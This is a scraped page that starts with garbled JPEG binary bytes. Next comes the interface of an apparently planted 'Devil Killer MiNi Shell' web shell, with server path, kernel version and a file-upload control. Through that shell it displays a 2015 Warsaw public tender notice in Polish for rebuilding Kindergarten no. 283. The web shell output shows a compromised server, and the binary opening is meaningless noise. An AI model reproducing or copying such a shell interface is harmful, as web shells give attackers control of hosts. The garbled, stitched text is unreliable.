JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150917/243606-N-2015.html

<p class="kh_header"><b>Warszawa: Przebudowa z rozbudową Przedszkola nr 283 przy ul. Puszczyka 6 w Warszawie 
- Etap I</b><br>
<b>Numer ogłoszenia: 243606 - 2015; data zamieszczenia: 17.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa z rozbudową Przedszkola nr 283 przy ul. Puszczyka 6 w Warszawie 
- Etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót budowlanych w etapie dotyczy wykonania pomieszczenia 0.10 - Sala zajęć ruchowych  i obejmuje wykonanie zabudowy podcieni wraz z przebudową pomieszczeń sąsiadujących. 

1.	Roboty branży budowlanej :
Roboty rozbiórkowe:
- wyburzenie ścian zewnętrznych plus usunięcie styropianu gr. 12cm (ściany w podcieniu) z demontażem stolarki okiennej i drzwiowej  oraz  utylizacją materiałów (ściany do wyburzenia z gazobetonu gr. 24cm),
- usunięcie i utylizacja styropianu gr. 5cm ze stropu podcienia,
- wyburzenie wskazanych ścian działowych gr. 12cm z cegły pełnej,
- demontaż i utylizacja wskazanej stolarki drzwiowej i okiennej,
- demontaż i utylizacja wskazanych naświetli nad otworami drzwiowymi,
- rozbiórka wskazanych posadzek podłogowych,
- skucie/demontaż posadzki dziedzińca:
- nawierzchnia z kostki betonowej - 6cm,
- podsypka cementowo-piaskowa - 20cm.
Roboty budowlane:
- wykonanie fundamentów (wykopy i podłoże fundamentowe z chudego betonu gr. 10cm, ławy żelbetowe szer. 40cm, wysokości 30cm, ściany z bloczków betonowych klasy B25) wraz z wykonaniem izolacji poziomych i pionowych,		
- wykonanie ścian zewnętrznych z bloczków silikatowych szer. 24cm,
- wykonanie konstrukcji monolitycznej z betonu klasy B25 [słup S1 (24x24cm), podciąg P1 (24x42cm), nadproża N1 - 2szt. (24x42cm), N2 (24x30cm) ], 
- wykonanie podłogi na gruncie:
- podsypka żwirowo - piaskowa gr. 30 zagęszczana warstwami co 10cm,
- płyta betonowa gr. 10cm zbrojona siatką posadzkową fi 6mm o oczku 150mm,
- wykonanie hydroizolacji jako papa na osnowie z włókniny poliestrowej gr. min. 3,2cm,
- ułożenie styropianu posadzkowego EPS100 gr. 10cm,
- wykonanie wylewki betonowej gr. 5cm,
- ułożenie parkietu w projektowanej części pomieszczenia 0.10, (parkiet dębowy, pokryty lakierem bezbarwnym,
- wykonanie listew podłogowych drewnianych w pomieszczeniach, 0.10,
- wykonanie wieńca żelbetowego 24x24cm,
- wykonanie ścianki attykowej w dobudowywanych częściach z bloczków gazobetonowych szer. 24cm z dociepleniem i wykonaniem obróbek blacharskich ze stali ocynkowanej na płycie OSB gr.2cm,
- wykonanie stropodachu płaskiego pełnego:
- ułożenie stropu gęstożebrowego z belkami sprężonymi o wysokości pustaka 12cm (część północna), 16cm (część południowa) i wykonanie warstwy nadbetonu gr. 4cm,
- ułożenie folii paroizolacyjnej na stropie,
- ułożenie styropapy EPS 100 ze spadkiem 16-20cm (część północna), 16-30cm (część południowa),
- wykonanie papy podkładowej, termozgrzewalnej gr. 3,4mm,
- wykonanie papy wierzchniego krycia, termozgrzewalnej gr. 5,2mm,
- montaż stolarki drzwiowej i okiennej. Typ, materiał i klasa odporności ogniowej zgodnie z zestawieniem stolarki,
- wykonanie docieplenia ścian w systemie BSO stosując materiały systemowe:
- przyklejenie styropianu / wełny mineralnej gr. 14cm obwodowo (lambda mniejsze bądź równe 0,031 W/mK) na ścianach nadziemnych, 10cm na ścianach fundamentowych;
- wykonanie warstwy kleju na siatce z włókna szklanego, 
- wykonanie tynku cienkowarstwowego mineralnego z gruntowaniem i malowaniem farbami silikonowymi,
- wykonanie ścian działowych z bloczków gazobetonowych gr. 12cm tynk. tynkiem cem. - wap. gr. 1,5cm,
- tynkowanie i  malowanie nowych ścian i sufitów w pomieszczeniu 0.10,
- malowanie istniejących ścian i sufitów w przebudowanych/ rozbudowanych pomieszczeniach 0.10 malowanie sufitów farbą emulsyjną: kolor biały),
- montaż płyt G-K  jako obudowy słupa wewn. w pomieszczeniu 0.10,
- montaż zadaszenia nad wejściem ze szkła laminowanego bezpiecznego na profilach i cięgnach stalowych z mocowaniem punktowym; szyba ze szkła przeciwsłonecznego barwionego w masie (kolor: brąz)
- montaż elementów zacieniających nad oknami: aluminiowe żaluzjowe typu łamacze światła, profil żaluzji C, szer.10cm,  lakierowane proszkowo w  kolorze brąz,
- wykonanie przelewu awaryjnego w ściance attyki (osadzenie rury kwadratowej z blachy stalowej ocynkowanej  o przekroju 10x10cm (nad pomieszczeniem 0,10),
- wykonanie pochylni z kostki brukowej przed wejściem na podsypce cementowo - piaskowej gr. 20cm i ułożenie kostki odzyskanej z wcześniejszej rozbiórki,
- montaż wyposażenia w pomieszczeniu 0.10 (sala zajęć ruchowych):
- szafy: drewniane regałowe o wymiarach podstawy 45x90cm - 3szt.
- szafa: drewniane regałowe o wymiarach podstawy 45x50cm - 1szt.
- szafa: drewniane regałowe o wymiarach podstawy 50x110cm - 1szt.
- drabinki gimnastyczne drewniane ze stalowymi zakotwiczeniami do ściany 65x190cm -3szt.

2. Roboty branży sanitarnej:
- demontaż żeliwnego wpustu  kanalizacji deszczowej o śr. 100 mm i utylizacja złomu,
- rozbiórka elementów konstrukcji betonowych wraz z wywozem i utylizacją gruzu,
- demontaż rurociągów stalowych c.o. o połączeniach spawanych,
- demontaż demolacyjny izolacji pokrytej zaprawą,
- demontaż zaworów grzejnikowych lub dwuzłączek oraz 4 kpl stalowych grzejników trzypłytowych,
- wywóz i utylizacja materiałów z demontażu, 
- wykonanie podejścia kanalizacji deszczowej od pionu do punktu włączenia,
-  wykonanie rurociągów c.o. z tworzyw sztucznych o średnicach  16, 20, 25 mm o połączeniach zgrzewanych na ścianach,
- punkty stałe w rurociągach z tworzyw sztucznych o śr. zewnętrznej 20 i 25- 2x2szt.,
- próby szczelności i płukanie instalacji c.o.,
- montaż zaworów odpowietrzających automatyczne, zaworu spustowego, zaworów stopowych pod odpowietrznikami,. zaworów grzejnikowych i zaworów powrotnych, 
- wstawienie odgałęzień z rur stalowych i rury przyłacznych z tworzyw sztucznych,
- montaż grzejników oraz próby z dokonaniem regulacji instalacji centralnego ogrzewania (na gorąco),
- roboty poinstalacyjne (malowanie, zakrycie kanału podłogowego,  naprawa przebić itp.)

3.	Roboty branży elektrycznej:
- odłączenie przewodów i demontaż przewodów kabelkowych nie opancerzonych oraz rur płaszczowych, 
-  demontaż  łączników  instalacyjnych, gniazd wtyczkowych i puszek instalacyjnych,
-  wykucie bruzd dla przewodów  wtynkowych w cegle, przebijanie otworów w ścianach lub stropach betonowych,
-  układanie przewodów kabelkowe w gotowych bruzdach oraz  zaprawienie tynkiem bruzd,
- podłączenie przewodów pod zaciski lub bolce w aparatach oraz pod zaciski w rozdzielni,
- wywiezienie i utylizacja gruzu,
- rozbudowa istniejących rozdzielnic: montaż wyłączników  nadprądowych oraz wyłącznika różnicowo prądowego ,
- przygotowanie podłoża, kompletowanie opraw oraz montaż z podłączeniem na gotowym podłożu opraw oświetlenia podstawowego, oświetlenia zewnętrznego oraz oświetlenia awaryjnego i ewakuacyjnego,
- przygotowanie podłoża z wykonaniem ślepych otworów i montaż na gotowym podłożu puszek instalacyjnych,
- montaż do gotowego podłoża gniazd wtyczkowych i łączników instalacyjnych podtynkowych wraz z ich podłączeniem,
- mechaniczne wykucie bruzd dla rur: RIP16,RIS16,RL22 instalacji teleinformatycznej i alarmowej i ułożenie w nich rur winidurowych karbowanych,
- montaż  puszek uniwersalnych oraz gniazd RJ45 kat 5a ,
- wciąganie w peszel i podłączenie przewodów kabelkowych skrętka UTP kat. 5a 
- pomiary elektryczne w tym pomiary impedancji pętli zwarciowej, pomiary rezystancji izolacji instalacji elektrycznych oraz natężenia oświetlenia,

Roboty budowlane wykonywane będą w czasie trwania  roku szkolnego, zatem należy je prowadzić z zachowaniem jak najmniejszej uciążliwości, roboty o dużej uciążliwości należy wykonywać po godzinach pracy przedszkola i w dni wolne od pracy przedszkola.
Wszystkie zastosowane materiały muszą posiadać atesty, certyfikaty i dopuszczenia do użytkowania. 

Szczegółowy opis przedmiotu zamówienia określa:
a)	wzór umowy stanowiący załącznik nr 7 do SIWZ
b)	projekt budowlano-wykonawczy (w zakresie wykonania etapu I): podział na etapy, architektura, branża sanitarna, branża elektryczna  - załącznik nr 8a do SIWZ stanowiący równocześnie załącznik nr 1 do wzoru umowy;
c)	przedmiary robót  w zakresie wykonania etapu I (branża budowlana, sanitarna, elektryczna) - załącznik nr 8b do SIWZ;
d)	Specyfikacje Techniczne Wykonania i Odbioru Robót (w zakresie wykonania etapu I) branża budowlana, sanitarna, elektryczna - załącznik nr 8c do SIWZ stanowiący równocześnie załącznik nr 2 do wzoru umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, o łącznej wartości do 50% wartości zamówienia podstawowego. Zamówienia uzupełniające polegać będą na przebudowie i rozbudowie Przedszkola nr 283 przy ul. Puszczyka 6 w Warszawie i będą powtórzeniem tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.11.13.00-1, 45.42.10.00-4, 45.43.00.00-0, 45.42.11.52-4, 45.42.11.46-9, 45.41.00.00-4, 45.44.00.00-3, 45.45.00.00-6, 45.32.00.00-6, 45.26.25.00-6, 45.22.35.00-1, 45.26.22.10-6, 45.26.10.00-4, 45.30.00.00-0, 45.31.12.00-2, 45.31.00.00-3, 45.31.11.00-1, 45.31.60.00-5, 45.31.43.10-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 4 000,00 złotych  (słownie: cztery tysiące złotych 00/100 groszy).
Wymagania dotyczące wnoszenia wadium określone zostały w pkt 22 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał1 (tj. zakończył) w ramach jednej umowy co najmniej jedną robotę budowlaną o wartości  nie mniejszej niż 200 000,00 zł brutto polegającą na budowie, odbudowie, rozbudowie, nadbudowie lub przebudowie budynku użyteczności publicznej, którego to definicja określona została w Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002 r., Nr 75, poz. 690 z późn zm.).

1  Za wykonaną robotę Zamawiający uzna taką robotę, której przedmiot został odebrany przez Zamawiającego jako wykonany w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach wyszczególnionych w sekcji III pkt III.4.1) Ogłoszenia. Z treści załączonego oświadczenia i dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, a w szczególności co najmniej jedną osobą wyznaczoną do sprawowania funkcji kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi co najmniej w ograniczonym zakresie w specjalności konstrukcyjno-budowlanej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2013 r., poz. 1409 z późn. zm).

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumencie wyszczególnionym w sekcji III pkt III.4.1) Ogłoszenia. Z treści załączonych oświadczeń i dokumentu musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1) Dowodami dotyczącymi najważniejszych robót, o których mowa w sekcji III.4.1) Ogłoszenia są:
a) poświadczenie;
b) inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a). 
Ww. dokument musi zawierać przyczyny braku możliwości uzyskania poświadczenia.

W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w niniejszym punkcie.

III.6.2) W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu,  potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych - innego/ych podmiotu/ów, niezależnie od charakteru prawnego łączących go z nim/i stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 

Dokument ten powinien w szczególności zawierać następujące informacje:
a) zakres dostępnych wykonawcy zasobów innego podmiotu;
b) sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia;
c) charakter stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
	
III.6.3) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji na wykonane roboty budowlane, o którym mowa w § 10 ust. 2 pkt 1 wzoru umowy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w następujących przypadkach:
1)	Zmiany terminu wykonania zamówienia określonego w §2 w szczególności 
z powodu: 
a) wstrzymania robót lub ich opóźnionego rozpoczęcia z powodu okoliczności zaistniałych po stronie Zamawiającego;
b) działań osób trzecich uniemożliwiających wykonanie robót, które to działania nie są konsekwencją winy którejkolwiek ze Stron;
c) wystąpienia konieczności wykonania zamówień dodatkowych;
d) wystąpienia robót - zamiennych z powodu: uzasadnionych zmian proponowanych przez Zamawiającego lub Wykonawcę w zakresie sposobu wykonania przedmiotu zamówienia, jeżeli zmiany te są korzystne dla Zamawiającego; aktualizacji materiałów/urządzeń, których użycie przewidziano przy realizacji przedmiotu zamówienia z uwagi na zmianę technologiczną; zaprzestania produkcji materiałów/urządzeń, których użycie przewidziano przy realizacji przedmiotu zamówienia; zmiany przepisów prawa budowlanego w trakcie realizacji przedmiotu zamówienia. Dopuszczalne są roboty zamienne w zakresie materiałów na materiały, spełniające parametry techniczne lub o wyższych parametrach niż określone w szczegółowym opisie przedmiotu zamówienia; 
e) nadzwyczajnych i niesprzyjających warunków atmosferycznych, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi - normami), 
